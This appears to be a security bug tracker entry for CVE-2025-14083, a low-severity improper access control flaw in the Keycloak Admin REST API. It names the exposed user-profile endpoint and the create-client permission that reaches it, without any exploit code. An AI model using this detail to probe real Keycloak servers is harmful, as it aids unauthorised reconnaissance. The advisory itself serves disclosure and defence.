Bug 2419086 (CVE-2025-14083)

Summary: CVE-2025-14083 keycloak-server: Keycloak: Improper Access Control in Admin REST API leads to information disclosure
Product: [Other] Security Response Reporter: OSIDB Bzimport <bzimport>
Component: vulnerabilityAssignee: Product Security DevOps Team <prodsec-dev>
Status: NEW --- QA Contact:
Severity: low Docs Contact:
Priority: low    
Version: unspecifiedCC: aschwart, boliveir, mposolda, pjindal, rmartinc, ssilvert, sthorger, vmuzikar
Target Milestone: ---Keywords: Security
Target Release: ---   
Hardware: All   
OS: Linux   
Whiteboard:
Fixed In Version: Doc Type: ---
Doc Text:
A flaw was found in the Keycloak Admin REST API. This vulnerability allows the exposure of backend schema and rules, potentially leading to targeted attacks or privilege escalation via improper access control.
 Story Points: ---
Clone Of: Environment:
Last Closed: Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:

Description OSIDB Bzimport 2025-12-05 06:11:16 UTC 
An Improper Access Control vulnerability exists in the Keycloak Admin REST API, where a user possessing only the create-client permission—considered low-privilege by design—can unexpectedly access the /admin/realms/master/users/profile endpoint. This endpoint returns internal user profile schema data, including attribute names, validation rules, display metadata, and permission mappings. Although the attacker cannot view actual user accounts, the exposure of backend schema and rules results from insufficient authorization checks specifically on this endpoint. An authenticated but minimally privileged user can remotely retrieve sensitive configuration metadata, which may be leveraged to craft targeted attacks or prepare future privilege-escalation attempts.